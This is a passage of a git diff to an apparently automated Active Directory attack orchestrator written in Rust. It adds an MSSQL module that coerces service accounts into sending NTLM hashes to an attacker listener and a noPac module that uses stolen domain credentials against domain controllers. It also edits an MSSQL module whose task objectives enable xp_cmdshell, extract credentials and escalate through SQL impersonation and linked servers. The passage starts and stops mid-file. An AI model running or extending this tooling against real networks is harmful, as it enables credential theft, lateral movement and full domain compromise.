pub use acl::auto_acl_chain_follow; +pub use acl_discovery::auto_acl_discovery; pub use adcs::auto_adcs_enumeration; pub use adcs_exploitation::auto_adcs_exploitation; +pub(crate) use adcs_exploitation::EXPLOITABLE_ESC_TYPES; pub use bloodhound::auto_bloodhound; +pub use certifried::auto_certifried; +pub use certipy_auth::auto_certipy_auth; pub use coercion::auto_coercion; pub use crack::auto_crack_dispatch; pub use credential_access::auto_credential_access; pub use credential_expansion::auto_credential_expansion; pub use credential_reuse::auto_credential_reuse; +pub use cross_forest_enum::auto_cross_forest_enum; +pub use dacl_abuse::auto_dacl_abuse; pub use delegation::auto_delegation_enumeration; +pub use dfs_coercion::auto_dfs_coercion; +pub use dns_enum::auto_dns_enum; +pub use domain_user_enum::auto_domain_user_enum; +pub use foreign_group_enum::auto_foreign_group_enum; pub use gmsa::auto_gmsa_extraction; +pub use golden_cert::auto_golden_cert; pub use golden_ticket::auto_golden_ticket; pub use gpo::auto_gpo_abuse; +pub use gpp_sysvol::auto_gpp_sysvol; +pub use group_enumeration::auto_group_enumeration; +pub use krbrelayup::auto_krbrelayup; pub use laps::auto_laps_extraction; +pub use ldap_signing::auto_ldap_signing; +pub use localuser_spray::auto_localuser_spray; +pub use lsassy_dump::auto_lsassy_dump; +pub use machine_account_quota::auto_machine_account_quota; pub use mssql::auto_mssql_detection; +pub use mssql_coercion::auto_mssql_coercion; pub use mssql_exploitation::auto_mssql_exploitation; +pub use nopac::auto_nopac; +pub use ntlm_relay::auto_ntlm_relay; +pub use ntlmv1_downgrade::auto_ntlmv1_downgrade; +pub use password_policy::auto_password_policy; +pub use petitpotam_unauth::auto_petitpotam_unauth; +pub use print_nightmare::auto_print_nightmare; +pub use pth_spray::auto_pth_spray; pub use rbcd::auto_rbcd_exploitation; +pub use rdp_lateral::auto_rdp_lateral; pub use refresh::state_refresh; pub use s4u::auto_s4u_exploitation; +pub use 
searchconnector_coercion::auto_searchconnector_coercion; pub use secretsdump::auto_local_admin_secretsdump; pub use shadow_credentials::auto_shadow_credentials; +pub use share_coercion::auto_share_coercion; pub use share_enum::auto_share_enumeration; pub use shares::auto_share_spider; +pub use sid_enumeration::auto_sid_enumeration; +pub use smb_signing::auto_smb_signing_detection; +pub use smbclient_enum::auto_smbclient_enum; +pub use spooler_check::auto_spooler_check; pub use stall_detection::auto_stall_detection; pub use trust::auto_trust_follow; pub use unconstrained::auto_unconstrained_exploitation; +pub use webdav_detection::auto_webdav_detection; +pub use winrm_lateral::auto_winrm_lateral; +pub use zerologon::auto_zerologon; pub(crate) fn crack_dedup_key(hash: &ares_core::models::Hash) -> String { let prefix = &hash.hash_value[..32.min(hash.hash_value.len())]; diff --git a/ares-cli/src/orchestrator/automation/mssql_coercion.rs b/ares-cli/src/orchestrator/automation/mssql_coercion.rs new file mode 100644 index 00000000..a9e9fbfa --- /dev/null +++ b/ares-cli/src/orchestrator/automation/mssql_coercion.rs @@ -0,0 +1,698 @@ +//! auto_mssql_coercion -- coerce NTLM authentication from MSSQL servers via +//! xp_dirtree/xp_fileexist. +//! +//! When we have MSSQL access (discovered by `auto_mssql_detection`) and a +//! listener IP, we can force the SQL Server service account to authenticate +//! back to our listener, capturing its NTLMv2 hash for cracking or relay. +//! +//! This is distinct from the general `auto_coercion` module which uses +//! PetitPotam/PrinterBug against DCs. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Monitors for MSSQL servers and dispatches xp_dirtree NTLM coercion. +/// Interval: 45s. 
+pub async fn auto_mssql_coercion(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) {
+    let mut interval = tokio::time::interval(Duration::from_secs(45));
+    interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+    loop {
+        tokio::select! {
+            _ = interval.tick() => {},
+            _ = shutdown.changed() => break,
+        }
+        if *shutdown.borrow() {
+            break;
+        }
+
+        if !dispatcher.is_technique_allowed("mssql_coercion") {
+            continue;
+        }
+
+        let listener = match dispatcher.config.listener_ip.as_deref() {
+            Some(ip) => ip.to_string(),
+            None => continue,
+        };
+
+        let work: Vec<MssqlCoercionWork> = {
+            let state = dispatcher.state.read().await;
+            collect_mssql_coercion_work(&state, &listener)
+        };
+
+        for item in work {
+            let payload = json!({
+                "technique": "mssql_ntlm_coercion",
+                "target_ip": item.target_ip,
+                "listener_ip": item.listener,
+                "credential": {
+                    "username": item.credential.username,
+                    "password": item.credential.password,
+                    "domain": item.credential.domain,
+                },
+            });
+
+            let priority = dispatcher.effective_priority("mssql_coercion");
+            match dispatcher
+                .throttled_submit("coercion", "coercion", payload, priority)
+                .await
+            {
+                Ok(Some(task_id)) => {
+                    info!(
+                        task_id = %task_id,
+                        target = %item.target_ip,
+                        "MSSQL xp_dirtree NTLM coercion dispatched"
+                    );
+
+                    dispatcher
+                        .state
+                        .write()
+                        .await
+                        .mark_processed(DEDUP_MSSQL_COERCION, item.dedup_key.clone());
+                    let _ = dispatcher
+                        .state
+                        .persist_dedup(&dispatcher.queue, DEDUP_MSSQL_COERCION, &item.dedup_key)
+                        .await;
+                }
+                Ok(None) => {
+                    debug!(target = %item.target_ip, "MSSQL coercion task deferred");
+                }
+                Err(e) => {
+                    warn!(err = %e, target = %item.target_ip, "Failed to dispatch MSSQL coercion");
+                }
+            }
+        }
+    }
+}
+
+/// Collect MSSQL coercion work items from the current state.
+///
+/// Extracted from the async loop so it can be unit-tested without a
+/// `Dispatcher` or real async runtime scaffolding.
+fn collect_mssql_coercion_work(
+    state: &crate::orchestrator::state::StateInner,
+    listener: &str,
+) -> Vec<MssqlCoercionWork> {
+    if state.credentials.is_empty() {
+        return Vec::new();
+    }
+
+    let mut items = Vec::new();
+
+    for vuln in state.discovered_vulnerabilities.values() {
+        if vuln.vuln_type.to_lowercase() != "mssql_access" {
+            continue;
+        }
+
+        let target_ip = vuln
+            .details
+            .get("target_ip")
+            .and_then(|v| v.as_str())
+            .unwrap_or(&vuln.target);
+
+        if target_ip.is_empty() {
+            continue;
+        }
+
+        let dedup_key = format!("mssql_coerce:{target_ip}");
+        if state.is_processed(DEDUP_MSSQL_COERCION, &dedup_key) {
+            continue;
+        }
+
+        let domain = vuln
+            .details
+            .get("domain")
+            .and_then(|v| v.as_str())
+            .unwrap_or("")
+            .to_string();
+
+        let cred = state
+            .credentials
+            .iter()
+            .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain.to_lowercase())
+            .or_else(|| state.credentials.first())
+            .cloned();
+
+        let cred = match cred {
+            Some(c) => c,
+            None => continue,
+        };
+
+        items.push(MssqlCoercionWork {
+            dedup_key,
+            target_ip: target_ip.to_string(),
+            listener: listener.to_string(),
+            credential: cred,
+        });
+    }
+
+    items
+}
+
+struct MssqlCoercionWork {
+    dedup_key: String,
+    target_ip: String,
+    listener: String,
+    credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn dedup_key_format() {
+        let key = format!("mssql_coerce:{}", "192.168.58.22");
+        assert_eq!(key, "mssql_coerce:192.168.58.22");
+    }
+
+    #[test]
+    fn dedup_set_name() {
+        assert_eq!(DEDUP_MSSQL_COERCION, "mssql_coercion");
+    }
+
+    #[test]
+    fn mssql_access_vuln_type_matching() {
+        assert_eq!("mssql_access".to_lowercase(), "mssql_access");
+        assert_ne!("smb_signing_disabled".to_lowercase(), "mssql_access");
+    }
+
+    #[test]
+    fn target_ip_from_vuln_details() {
+        let details = serde_json::json!({"target_ip": "192.168.58.22"});
+        let target = details
+            .get("target_ip")
+            .and_then(|v| v.as_str())
+            .unwrap_or("fallback");
+        assert_eq!(target, "192.168.58.22");
+    }
+
+    #[test]
+    fn target_ip_fallback_to_vuln_target() {
+        let details = serde_json::json!({});
+        let fallback = "192.168.58.10";
+        let target = details
+            .get("target_ip")
+            .and_then(|v| v.as_str())
+            .unwrap_or(fallback);
+        assert_eq!(target, "192.168.58.10");
+    }
+
+    #[test]
+    fn credential_domain_matching() {
+        let domain = "contoso.local".to_string();
+        let cred_domain = "CONTOSO.LOCAL";
+        let matches = !domain.is_empty() && cred_domain.to_lowercase() == domain.to_lowercase();
+        assert!(matches);
+    }
+
+    #[test]
+    fn credential_domain_empty_no_match() {
+        let domain = "".to_string();
+        let cred_domain = "contoso.local";
+        let matches = !domain.is_empty() && cred_domain.to_lowercase() == domain.to_lowercase();
+        assert!(!matches);
+    }
+
+    #[test]
+    fn mssql_coercion_payload_structure() {
+        let payload = serde_json::json!({
+            "technique": "mssql_ntlm_coercion",
+            "target_ip": "192.168.58.22",
+            "listener_ip": "192.168.58.100",
+            "credential": {
+                "username": "sa",
+                "password": "P@ssw0rd!",
+                "domain": "contoso.local",
+            },
+        });
+        assert_eq!(payload["technique"], "mssql_ntlm_coercion");
+        assert_eq!(payload["target_ip"], "192.168.58.22");
+        assert_eq!(payload["listener_ip"], "192.168.58.100");
+        assert_eq!(payload["credential"]["username"], "sa");
+    }
+
+    #[test]
+    fn domain_extraction_from_vuln() {
+        let details = serde_json::json!({"domain": "contoso.local"});
+        let domain = details
+            .get("domain")
+            .and_then(|v| v.as_str())
+            .unwrap_or("")
+            .to_string();
+        assert_eq!(domain, "contoso.local");
+
+        let details2 = serde_json::json!({});
+        let domain2 = details2
+            .get("domain")
+            .and_then(|v| v.as_str())
+            .unwrap_or("")
+            .to_string();
+        assert_eq!(domain2, "");
+    }
+
+    #[test]
+    fn mssql_coercion_work_fields() {
+        let cred = ares_core::models::Credential {
+            id: "c1".into(),
+            username: "sa".into(),
+            password: "P@ssw0rd!".into(), // pragma: allowlist secret
+            domain: "contoso.local".into(),
+            source: "test".into(),
+            is_admin: false,
+            discovered_at: None,
+            parent_id: None,
+            attack_step: 0,
+        };
+        let work = MssqlCoercionWork {
+            dedup_key: "mssql_coerce:192.168.58.22".into(),
+            target_ip: "192.168.58.22".into(),
+            listener: "192.168.58.100".into(),
+            credential: cred,
+        };
+        assert_eq!(work.target_ip, "192.168.58.22");
+        assert_eq!(work.listener, "192.168.58.100");
+    }
+
+    // --- collect_mssql_coercion_work integration tests ---
+
+    use crate::orchestrator::state::SharedState;
+
+    fn make_cred(user: &str, domain: &str) -> ares_core::models::Credential {
+        ares_core::models::Credential {
+            id: format!("c-{user}"),
+            username: user.into(),
+            password: "P@ssw0rd!".into(), // pragma: allowlist secret
+            domain: domain.into(),
+            source: "test".into(),
+            is_admin: false,
+            discovered_at: None,
+            parent_id: None,
+            attack_step: 0,
+        }
+    }
+
+    fn make_vuln(
+        id: &str,
+        vuln_type: &str,
+        target: &str,
+        details: serde_json::Value,
+    ) -> ares_core::models::VulnerabilityInfo {
+        let details_map: std::collections::HashMap<String, serde_json::Value> =
+            serde_json::from_value(details).unwrap_or_default();
+        ares_core::models::VulnerabilityInfo {
+            vuln_id: id.into(),
+            vuln_type: vuln_type.into(),
+            target: target.into(),
+            discovered_by: "test".into(),
+            discovered_at: chrono::Utc::now(),
+            details: details_map,
+            recommended_agent: String::new(),
+            priority: 5,
+        }
+    }
+
+    #[tokio::test]
+    async fn collect_empty_state_returns_nothing() {
+        let shared = SharedState::new("test".into());
+        let state = shared.read().await;
+        let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+        assert!(work.is_empty());
+    }
+
+    #[tokio::test]
+    async fn collect_no_vulns_with_creds_returns_nothing() {
+        let shared = SharedState::new("test".into());
+        {
+            let mut state = shared.write().await;
+            state.credentials.push(make_cred("sa", "contoso.local"));
+        }
+        let state = shared.read().await;
+        let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+        assert!(work.is_empty());
+    }
+
+    #[tokio::test]
+    async fn collect_mssql_access_vuln_produces_work() {
+        let shared = SharedState::new("test".into());
+        {
+            let mut state = shared.write().await;
+            state.credentials.push(make_cred("sa", "contoso.local"));
+            state.discovered_vulnerabilities.insert(
+                "v1".into(),
+                make_vuln(
+                    "v1",
+                    "mssql_access",
+                    "192.168.58.22",
+                    json!({"target_ip": "192.168.58.22", "domain": "contoso.local"}),
+                ),
+            );
+        }
+        let state = shared.read().await;
+        let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+        assert_eq!(work.len(), 1);
+        assert_eq!(work[0].target_ip, "192.168.58.22");
+        assert_eq!(work[0].listener, "192.168.58.100");
+        assert_eq!(work[0].dedup_key, "mssql_coerce:192.168.58.22");
+        assert_eq!(work[0].credential.username, "sa");
+        assert_eq!(work[0].credential.domain, "contoso.local");
+    }
+
+    #[tokio::test]
+    async fn collect_skips_non_mssql_vulns() {
+        let shared = SharedState::new("test".into());
+        {
+            let mut state = shared.write().await;
+            state.credentials.push(make_cred("sa", "contoso.local"));
+            state.discovered_vulnerabilities.insert(
+                "v1".into(),
+                make_vuln(
+                    "v1",
+                    "smb_signing_disabled",
+                    "192.168.58.22",
+                    json!({"target_ip": "192.168.58.22"}),
+                ),
+            );
+        }
+        let state = shared.read().await;
+        let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+        assert!(work.is_empty());
+    }
+
+    #[tokio::test]
+    async fn collect_dedup_skips_already_processed() {
+        let shared = SharedState::new("test".into());
+        {
+            let mut state = shared.write().await;
+            state.credentials.push(make_cred("sa", "contoso.local"));
+            state.discovered_vulnerabilities.insert(
+                "v1".into(),
+                make_vuln(
+                    "v1",
+                    "mssql_access",
+                    "192.168.58.22",
+                    json!({"target_ip": "192.168.58.22", "domain": "contoso.local"}),
+                ),
+            );
+            state.mark_processed(DEDUP_MSSQL_COERCION, "mssql_coerce:192.168.58.22".into());
+        }
+        let state = shared.read().await;
+        let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+        assert!(work.is_empty());
+    }
+
+    #[tokio::test]
+    async fn collect_target_ip_falls_back_to_vuln_target() {
+        let shared = SharedState::new("test".into());
+        {
+            let mut state = shared.write().await;
+            state.credentials.push(make_cred("sa", "contoso.local"));
+            state.discovered_vulnerabilities.insert(
+                "v1".into(),
+                make_vuln("v1", "mssql_access", "192.168.58.30", json!({})),
+            );
+        }
+        let state = shared.read().await;
+        let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+        assert_eq!(work.len(), 1);
+        assert_eq!(work[0].target_ip, "192.168.58.30");
+    }
+
+    #[tokio::test]
+    async fn collect_skips_empty_target_ip() {
+        let shared = SharedState::new("test".into());
+        {
+            let mut state = shared.write().await;
+            state.credentials.push(make_cred("sa", "contoso.local"));
+            state.discovered_vulnerabilities.insert(
+                "v1".into(),
+                make_vuln("v1", "mssql_access", "", json!({"target_ip": ""})),
+            );
+        }
+        let state = shared.read().await;
+        let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+        assert!(work.is_empty());
+    }
+
+    #[tokio::test]
+    async fn collect_prefers_domain_matching_credential() {
+        let shared = SharedState::new("test".into());
+        {
+            let mut state = shared.write().await;
+            state.credentials.push(make_cred("admin", "fabrikam.local"));
+            state.credentials.push(make_cred("sa", "contoso.local"));
+            state.discovered_vulnerabilities.insert(
+                "v1".into(),
+                make_vuln(
+                    "v1",
+                    "mssql_access",
+                    "192.168.58.22",
+                    json!({"target_ip": "192.168.58.22", "domain": "contoso.local"}),
+                ),
+            );
+        }
+        let state = shared.read().await;
+        let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+        assert_eq!(work.len(), 1);
+        assert_eq!(work[0].credential.username, "sa");
+        assert_eq!(work[0].credential.domain, "contoso.local");
+    }
+
+    #[tokio::test]
+    async fn collect_falls_back_to_first_cred_when_no_domain_match() {
+        let shared = SharedState::new("test".into());
+        {
+            let mut state = shared.write().await;
+            state.credentials.push(make_cred("admin", "fabrikam.local"));
+            state.discovered_vulnerabilities.insert(
+                "v1".into(),
+                make_vuln(
+                    "v1",
+                    "mssql_access",
+                    "192.168.58.22",
+                    json!({"target_ip": "192.168.58.22", "domain": "contoso.local"}),
+                ),
+            );
+        }
+        let state = shared.read().await;
+        let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+        assert_eq!(work.len(), 1);
+        assert_eq!(work[0].credential.username, "admin");
+    }
+
+    #[tokio::test]
+    async fn collect_falls_back_to_first_cred_when_domain_empty() {
+        let shared = SharedState::new("test".into());
+        {
+            let mut state = shared.write().await;
+            state.credentials.push(make_cred("sa", "contoso.local"));
+            state.discovered_vulnerabilities.insert(
+                "v1".into(),
+                make_vuln(
+                    "v1",
+                    "mssql_access",
+                    "192.168.58.22",
+                    json!({"target_ip": "192.168.58.22"}),
+                ),
+            );
+        }
+        let state = shared.read().await;
+        let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+        assert_eq!(work.len(), 1);
+        assert_eq!(work[0].credential.username, "sa");
+    }
+
+    #[tokio::test]
+    async fn collect_multiple_vulns_produce_multiple_work_items() {
+        let shared = SharedState::new("test".into());
+        {
+            let mut state = shared.write().await;
+            state.credentials.push(make_cred("sa", "contoso.local"));
+            state.discovered_vulnerabilities.insert(
+                "v1".into(),
+                make_vuln(
+                    "v1",
+                    "mssql_access",
+                    "192.168.58.22",
+                    json!({"target_ip": "192.168.58.22", "domain": "contoso.local"}),
+                ),
+            );
+            state.discovered_vulnerabilities.insert(
+                "v2".into(),
+                make_vuln(
+                    "v2",
+                    "mssql_access",
+                    "192.168.58.23",
+                    json!({"target_ip": "192.168.58.23", "domain": "contoso.local"}),
+                ),
+            );
+        }
+        let state = shared.read().await;
+        let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+        assert_eq!(work.len(), 2);
+        let ips: std::collections::HashSet<&str> =
+            work.iter().map(|w| w.target_ip.as_str()).collect();
+        assert!(ips.contains("192.168.58.22"));
+        assert!(ips.contains("192.168.58.23"));
+    }
+
+    #[tokio::test]
+    async fn collect_case_insensitive_vuln_type() {
+        let shared = SharedState::new("test".into());
+        {
+            let mut state = shared.write().await;
+            state.credentials.push(make_cred("sa", "contoso.local"));
+            state.discovered_vulnerabilities.insert(
+                "v1".into(),
+                make_vuln(
+                    "v1",
+                    "MSSQL_ACCESS",
+                    "192.168.58.22",
+                    json!({"target_ip": "192.168.58.22"}),
+                ),
+            );
+        }
+        let state = shared.read().await;
+        let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+        assert_eq!(work.len(), 1);
+    }
+
+    #[tokio::test]
+    async fn collect_case_insensitive_domain_matching() {
+        let shared = SharedState::new("test".into());
+        {
+            let mut state = shared.write().await;
+            state.credentials.push(make_cred("sa", "CONTOSO.LOCAL"));
+            state.discovered_vulnerabilities.insert(
+                "v1".into(),
+                make_vuln(
+                    "v1",
+                    "mssql_access",
+                    "192.168.58.22",
+                    json!({"target_ip": "192.168.58.22", "domain": "contoso.local"}),
+                ),
+            );
+        }
+        let state = shared.read().await;
+        let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+        assert_eq!(work.len(), 1);
+        assert_eq!(work[0].credential.username, "sa");
+    }
+
+    #[tokio::test]
+    async fn collect_partial_dedup_only_skips_processed() {
+        let shared = SharedState::new("test".into());
+        {
+            let mut state = shared.write().await;
+            state.credentials.push(make_cred("sa", "contoso.local"));
+            state.discovered_vulnerabilities.insert(
+                "v1".into(),
+                make_vuln(
+                    "v1",
+                    "mssql_access",
+                    "192.168.58.22",
+                    json!({"target_ip": "192.168.58.22"}),
+                ),
+            );
+            state.discovered_vulnerabilities.insert(
+                "v2".into(),
+                make_vuln(
+                    "v2",
+                    "mssql_access",
+                    "192.168.58.23",
+                    json!({"target_ip": "192.168.58.23"}),
+                ),
+            );
+            state.mark_processed(DEDUP_MSSQL_COERCION, "mssql_coerce:192.168.58.22".into());
+        }
+        let state = shared.read().await;
+        let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+        assert_eq!(work.len(), 1);
+        assert_eq!(work[0].target_ip, "192.168.58.23");
+    }
+
+    #[tokio::test]
+    async fn collect_listener_propagated_to_work() {
+        let shared = SharedState::new("test".into());
+        {
+            let mut state = shared.write().await;
+            state.credentials.push(make_cred("sa", "contoso.local"));
+            state.discovered_vulnerabilities.insert(
+                "v1".into(),
+                make_vuln(
+                    "v1",
+                    "mssql_access",
+                    "192.168.58.22",
+                    json!({"target_ip": "192.168.58.22"}),
+                ),
+            );
+        }
+        let state = shared.read().await;
+        let work = collect_mssql_coercion_work(&state, "192.168.58.50");
+        assert_eq!(work.len(), 1);
+        assert_eq!(work[0].listener, "192.168.58.50");
+    }
+
+    #[tokio::test]
+    async fn collect_mixed_vuln_types_only_mssql_access() {
+        let shared = SharedState::new("test".into());
+        {
+            let mut state = shared.write().await;
+            state.credentials.push(make_cred("sa", "contoso.local"));
+            state.discovered_vulnerabilities.insert(
+                "v1".into(),
+                make_vuln(
+                    "v1",
+                    "mssql_access",
+                    "192.168.58.22",
+                    json!({"target_ip": "192.168.58.22"}),
+                ),
+            );
+            state.discovered_vulnerabilities.insert(
+                "v2".into(),
+                make_vuln(
+                    "v2",
+                    "constrained_delegation",
+                    "192.168.58.23",
+                    json!({"target_ip": "192.168.58.23"}),
+                ),
+            );
+            state.discovered_vulnerabilities.insert(
+                "v3".into(),
+                make_vuln(
+                    "v3",
+                    "mssql_impersonation",
+                    "192.168.58.24",
+                    json!({"target_ip": "192.168.58.24"}),
+                ),
+            );
+        }
+        let state = shared.read().await;
+        let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+        assert_eq!(work.len(), 1);
+        assert_eq!(work[0].target_ip, "192.168.58.22");
+    }
+
+    #[tokio::test]
+    async fn collect_vuln_with_empty_target_and_no_detail_ip_skipped() {
+        let shared = SharedState::new("test".into());
+        {
+            let mut state = shared.write().await;
+            state.credentials.push(make_cred("sa", "contoso.local"));
+            state.discovered_vulnerabilities.insert(
+                "v1".into(),
+                make_vuln("v1", "mssql_access", "", json!({"domain": "contoso.local"})),
+            );
+        }
+        let state = shared.read().await;
+        let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+        assert!(work.is_empty());
+    }
+}
diff --git a/ares-cli/src/orchestrator/automation/mssql_exploitation.rs b/ares-cli/src/orchestrator/automation/mssql_exploitation.rs
index 8c2ab558..75a41efe 100644
--- a/ares-cli/src/orchestrator/automation/mssql_exploitation.rs
+++ b/ares-cli/src/orchestrator/automation/mssql_exploitation.rs
@@ -21,7 +21,7 @@ use tracing::{debug, info, warn};
 use crate::orchestrator::dispatcher::Dispatcher;
 
 /// Dedup key prefix for MSSQL deep exploitation.
-const DEDUP_MSSQL_DEEP: &str = "mssql_deep";
+pub(crate) const DEDUP_MSSQL_DEEP: &str = "mssql_deep";
 
 /// Monitors for exploited MSSQL vulns and dispatches follow-up exploitation.
 /// Interval: 30s.
@@ -83,8 +83,18 @@ pub async fn auto_mssql_exploitation(
                 .to_string();
 
             // Find a credential for MSSQL access.
-            // Prefer creds for the target domain, fall back to any cred.
-            let credential = state
+            // When the target domain is known, prefer a credential from
+            // that domain (cross-forest NTLM auth otherwise falls through
+            // to Guest, e.g. jdoe@contoso.local → FABRIKAM\Guest on
+            // fabrikam.local SQLEXPRESS).
+            //
+            // For `mssql_linked_server` vulns, fall back to a trusted-domain
+            // credential when no same-domain cred exists: the link hop
+            // executes via stored login mapping on the remote side, so
+            // any cred that authenticates to the source server is fine
+            // (e.g., a north cred lands on castelblack, then EXEC AT
+            // [BRAAVOS] runs as essos\sql_svc via the stored mapping).
+ let same_domain = state .credentials .iter() .find(|c| { @@ -93,13 +103,21 @@ pub async fn auto_mssql_exploitation( && (domain.is_empty() || c.domain.to_lowercase() == domain.to_lowercase()) }) - .or_else(|| { - state.credentials.iter().find(|c| { - !c.password.is_empty() - && !state.is_credential_quarantined(&c.username, &c.domain) - }) - }) .cloned(); + let credential = same_domain.or_else(|| { + if domain.is_empty() { + state + .credentials + .iter() + .find(|c| { + !c.password.is_empty() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .cloned() + } else { + state.find_trust_credential(&domain) + } + }); if credential.is_none() { debug!( @@ -142,9 +160,17 @@ pub async fn auto_mssql_exploitation( "objectives": [ "Enable xp_cmdshell and execute whoami to confirm code execution", "Try EXECUTE AS LOGIN = 'sa' if current user is not sysadmin", + "Enumerate ALL impersonation privileges: SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'", + "For each impersonatable login, try EXECUTE AS LOGIN = '' and check IS_SRVROLEMEMBER('sysadmin')", + "Check database-level impersonation: SELECT * FROM sys.database_permissions WHERE permission_name = 'IMPERSONATE'", + "Try EXECUTE AS USER = 'dbo' in each database (master, msdb, tempdb) for db_owner escalation", + "Check if any database has TRUSTWORTHY = ON: SELECT name, is_trustworthy_on FROM sys.databases WHERE is_trustworthy_on = 1", "Extract credentials via xp_cmdshell (e.g., whoami /priv, reg query for autologon)", "Check for SeImpersonatePrivilege for potato escalation", - "Enumerate linked servers for lateral movement", + "Enumerate linked servers and test RPC execution on each link", + "Check who is sysadmin: SELECT name FROM sys.server_principals WHERE IS_SRVROLEMEMBER('sysadmin', name) = 1", + "For cross-forest linked-server pivots: enumerate SELECT s.name, s.is_rpc_out_enabled, 
l.uses_self_credential, l.remote_name FROM sys.servers s LEFT JOIN sys.linked_logins l ON s.server_id = l.server_id; — if `is_rpc_out_enabled=1` and `uses_self_credential=0`, use `mssql_openquery` (rides stored login mapping, bypasses double-hop)", + "If `mssql_exec_linked` fails on a cross-forest link with auth errors, retry with `impersonate_user='sa'` to wrap the hop in `EXECUTE AS LOGIN`, or switch to `mssql_openquery`", ], }); @@ -192,7 +218,7 @@ struct MssqlDeepWork { /// MSSQL exploitation (follow-up on confirmed MSSQL access). pub(crate) fn is_mssql_deep_candidate(vuln_type: &str) -> bool { let vtype = vuln_type.to_lowercase(); - vtype == "mssql_access" || vtype == "mssql_linked_server" + vtype == "mssql_access" || vtype == "mssql_linked_server" || vtype == "mssql_impersonation" } /// Extract the target IP from vulnerability details, with fallbacks. @@ -227,11 +253,12 @@ mod tests { assert!(is_mssql_deep_candidate("MSSQL_ACCESS")); assert!(is_mssql_deep_candidate("mssql_linked_server")); assert!(is_mssql_deep_candidate("MSSQL_LINKED_SERVER")); + assert!(is_mssql_deep_candidate("mssql_impersonation")); + assert!(is_mssql_deep_candidate("MSSQL_IMPERSONATION")); } #[test] fn is_mssql_deep_candidate_negative() { - assert!(!is_mssql_deep_candidate("mssql_impersonation")); assert!(!is_mssql_deep_candidate("rbcd")); assert!(!is_mssql_deep_candidate("esc1")); assert!(!is_mssql_deep_candidate("")); diff --git a/ares-cli/src/orchestrator/automation/nopac.rs b/ares-cli/src/orchestrator/automation/nopac.rs new file mode 100644 index 00000000..dac662c2 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/nopac.rs @@ -0,0 +1,384 @@ +//! auto_nopac -- exploit CVE-2021-42287/CVE-2021-42278 (noPac / SamAccountName +//! spoofing) when conditions are met. +//! +//! noPac creates a computer account, renames it to match a DC, requests a TGT, +//! then restores the name. The TGT now impersonates the DC, enabling DCSync. +//! 
Requires: valid domain credentials, MAQ > 0 (default 10), unpatched DCs. +//! +//! The worker has a `nopac` tool that wraps the full chain. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect noPac work items from state (pure logic, no async). +fn collect_nopac_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + // Skip domains we already dominate -- noPac is pointless if we have krbtgt + if state.dominated_domains.contains(&domain.to_lowercase()) { + continue; + } + + // Find a credential for this domain + let cred = match state + .credentials + .iter() + .find(|c| c.domain.to_lowercase() == domain.to_lowercase()) + { + Some(c) => c.clone(), + None => continue, + }; + + let dedup_key = format!("nopac:{}:{}", domain.to_lowercase(), dc_ip); + if state.is_processed(DEDUP_NOPAC, &dedup_key) { + continue; + } + + items.push(NopacWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred, + }); + } + + items +} + +/// Monitors for noPac exploitation opportunities. +/// Dispatches against each DC+credential pair once. +/// Interval: 45s (low-priority CVE check). +pub async fn auto_nopac(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! 
{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("nopac") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_nopac_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "nopac", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("nopac"); + match dispatcher + .throttled_submit("exploit", "privesc", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + dc = %item.dc_ip, + domain = %item.domain, + "noPac (CVE-2021-42287) exploitation dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_NOPAC, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_NOPAC, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(dc = %item.dc_ip, "noPac task deferred by throttler"); + } + Err(e) => { + warn!(err = %e, dc = %item.dc_ip, "Failed to dispatch noPac"); + } + } + } + } +} + +struct NopacWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + 